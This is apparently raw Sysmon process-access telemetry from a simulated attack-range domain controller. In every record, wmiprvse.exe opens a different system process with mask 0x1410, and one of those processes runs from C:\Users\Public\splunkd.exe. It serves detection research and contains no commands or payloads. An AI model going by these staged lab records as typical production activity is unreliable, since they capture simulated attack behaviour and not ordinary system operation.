15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023364Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023363Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023362Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023361Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023360Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023359Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023358Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023357Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023356Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023355Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023354Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023353Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023352Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023351Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023350Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023349Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.179{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023348Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023347Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023346Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:18.163{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023345Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 